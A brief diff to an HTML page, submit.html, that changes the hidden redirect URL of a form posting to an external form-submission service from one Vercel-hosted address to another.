--- a/submit.html
+++ b/submit.html
@@ -9,7 +9,7 @@
     </head>
     <body>
         <form action="https://submit-form.com/yi9xhvUk0" method="post">
-            <input type="hidden" name="_redirect" value="https://pasward.vercel.app/"/>
+            <input type="hidden" name="_redirect" value="https://confrim-submission.vercel.app"/>
             <div id="root">
                 <div>
                     <form>
